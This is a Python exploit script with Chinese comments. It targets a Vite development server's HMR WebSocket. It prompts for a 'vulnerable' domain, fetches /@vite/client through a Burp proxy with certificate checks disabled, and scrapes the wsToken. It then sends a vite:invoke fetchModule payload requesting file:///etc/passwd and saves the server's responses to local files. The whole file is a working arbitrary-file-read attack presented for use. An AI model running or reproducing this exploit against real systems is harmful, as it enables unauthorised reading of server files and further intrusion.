import asyncio import json import re import socket import ssl import urllib.request from pathlib import Path from urllib.parse import urlparse from websockets.asyncio.client import connect from websockets.exceptions import InvalidHandshake, InvalidStatus BURP_HOST = "127.0.0.1" BURP_PORT = 8080 BURP_PROXY = f"http://{BURP_HOST}:{BURP_PORT}" HOST=input("请你输入有漏洞的网站域名(例如:www.baidu.com):") PORT = 5173 HTTPS_ORIGIN = f"https://{HOST}:{PORT}" REFERER = f"{HTTPS_ORIGIN}/" VITE_CLIENT_URL = f"{HTTPS_ORIGIN}/@vite/client" CONNECT_TIMEOUT = 10 MESSAGE_TIMEOUT = 5 MAX_MESSAGES = 20 PAYLOAD = { "type": "custom", "event": "vite:invoke", "data": { "name": "fetchModule", "id": "send:1", "data": ["file:///etc/passwd?raw"], }, } def insecure_ssl_context() -> ssl.SSLContext: """ 测试环境下为了让 Python 接受 Burp 的 TLS 拦截证书。 正式环境建议导入 Burp CA,而不是关闭校验。 """ ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE return ctx def fetch_vite_client_js() -> str: ctx = insecure_ssl_context() opener = urllib.request.build_opener( urllib.request.ProxyHandler({ "http": BURP_PROXY, "https": BURP_PROXY, }), urllib.request.HTTPSHandler(context=ctx), ) req = urllib.request.Request( VITE_CLIENT_URL, headers={ "Host": f"{HOST}:{PORT}", "Origin": HTTPS_ORIGIN, "Referer": REFERER, "User-Agent": ( "Mozilla/5.0 (Windows NT 10.0; Win64; x64) " "AppleWebKit/537.36 (KHTML, like Gecko) " "Chrome/147.0.7727.56 Safari/537.36" ), "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.9,en-GB;q=0.8,en;q=0.7", }, ) print(f"[+] Fetching {VITE_CLIENT_URL} via Burp") with opener.open(req, timeout=CONNECT_TIMEOUT) as resp: body = resp.read().decode("utf-8", errors="replace") print(f"[+] /@vite/client length: {len(body)}") return body def extract_ws_token(client_js: str) -> str: """ 从 /@vite/client 响应 JS 中提取 wsToken。 """ patterns = [ r'const\s+wsToken\s*=\s*["\']([^"\']+)["\']', r'let\s+wsToken\s*=\s*["\']([^"\']+)["\']', r'var\s+wsToken\s*=\s*["\']([^"\']+)["\']', r'wsToken\s*=\s*["\']([^"\']+)["\']', ] for pattern in patterns: match = re.search(pattern, client_js, re.S) if match: return match.group(1) idx = client_js.find("wsToken") if idx == -1: idx = client_js.find("token") print("[!] Could not extract wsToken automatically.") if idx != -1: print("[!] Nearby JS snippet:") print(client_js[max(0, idx - 300): idx + 500]) raise RuntimeError("无法从 /@vite/client 中提取 wsToken") def open_burp_connect_tunnel(host: str, port: int) -> socket.socket: print(f"[+] Connecting to Burp: {BURP_HOST}:{BURP_PORT}") s = socket.create_connection((BURP_HOST, BURP_PORT), timeout=CONNECT_TIMEOUT) connect_req = ( f"CONNECT {host}:{port} HTTP/1.1\r\n" f"Host: {host}:{port}\r\n" "Proxy-Connection: keep-alive\r\n" "\r\n" ) print("[+] Sending CONNECT to Burp") s.sendall(connect_req.encode("ascii")) data = b"" while b"\r\n\r\n" not in data: chunk = s.recv(4096) if not chunk: s.close() raise RuntimeError("Burp closed connection before CONNECT response") data += chunk header_text = data.decode("iso-8859-1", errors="replace") print("[+] Burp CONNECT response:") print(header_text) first_line = header_text.splitlines()[0] if header_text.splitlines() else "" if " 200 " not in first_line: s.close() raise RuntimeError(f"CONNECT failed: {first_line}") s.settimeout(None) return s async def recv_multiple(ws) -> list[str]: messages = [] for i in range(MAX_MESSAGES): try: async with asyncio.timeout(MESSAGE_TIMEOUT): msg = await ws.recv() messages.append(msg) print(f"\n[RECV {i + 1}]") print(repr(msg)) except TimeoutError: print(f"\n[+] No more messages after {MESSAGE_TIMEOUT}s") break return messages def is_connected_message(msg: str) -> bool: """ 判断是否是 Vite 默认 connected 消息。 """ try: obj = json.loads(msg) return obj.get("type") == "connected" except Exception: return False async def connect_send_recv(ws_uri: str): parsed = urlparse(ws_uri) ws_host = parsed.hostname ws_port = parsed.port or 443 tunnel_sock = open_burp_connect_tunnel(ws_host, ws_port) ctx = insecure_ssl_context() try: async with connect( ws_uri, proxy=None, sock=tunnel_sock, # WSS + Burp TLS ssl=ctx, server_hostname=ws_host, open_timeout=CONNECT_TIMEOUT, close_timeout=5, ping_interval=None, origin=HTTPS_ORIGIN, subprotocols=["vite-hmr"], compression=None, user_agent_header=( "Mozilla/5.0 (Windows NT 10.0; Win64; x64) " "AppleWebKit/537.36 (KHTML, like Gecko) " "Chrome/147.0.7727.56 Safari/537.36" ), additional_headers={ "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.9,en-GB;q=0.8,en;q=0.7", "Referer": REFERER, }, ) as ws: print("[+] WebSocket HANDSHAKE OK") print("[+] URI:", ws_uri) print("[+] Selected subprotocol:", ws.subprotocol) print("\n[REQUEST HEADERS]") print(ws.request.headers) print("\n[RESPONSE HEADERS]") print(ws.response.headers) message = json.dumps(PAYLOAD, ensure_ascii=False, separators=(",", ":")) print("\n[SENT]") print(message) await ws.send(message) messages = await recv_multiple(ws) business_messages = [ msg for msg in messages if not is_connected_message(msg) ] Path("all_messages.txt").write_text( "\n\n".join(str(m) for m in messages), encoding="utf-8", ) Path("business_messages.txt").write_text( "\n\n".join(str(m) for m in business_messages), encoding="utf-8", ) if messages: Path("status.txt").write_text("replied\n", encoding="utf-8") else: Path("status.txt").write_text("sent_no_reply\n", encoding="utf-8") print("\n[+] Summary") print(f"Total messages: {len(messages)}") print(f"Business messages excluding connected: {len(business_messages)}") print("Saved: all_messages.txt") print("Saved: business_messages.txt") print("Saved: status.txt") except InvalidStatus as e: print("[!] HANDSHAKE FAILED: InvalidStatus") response = getattr(e, "response", None) if response is not None: print("Status:", getattr(response, "status_code", None)) print("Reason:", getattr(response, "reason_phrase", None)) print("Headers:") for k, v in response.headers.raw_items(): print(f"{k}: {v}") Path("status.txt").write_text("handshake_failed\n", encoding="utf-8") except InvalidHandshake as e: print("[!] HANDSHAKE FAILED: InvalidHandshake") print(repr(e)) Path("status.txt").write_text("handshake_failed\n", encoding="utf-8") except Exception as e: print("[!] ERROR") print(type(e).__name__, repr(e)) Path("status.txt").write_text("error\n", encoding="utf-8") async def main(): client_js = fetch_vite_client_js() ws_token = extract_ws_token(client_js) print("[+] Extracted wsToken:", ws_token) ws_uri = f"wss://{HOST}:{PORT}/?token={ws_token}" print("[+] Trying WS URI:", ws_uri) await connect_send_recv(ws_uri) if __name__ == "__main__": asyncio.run(main())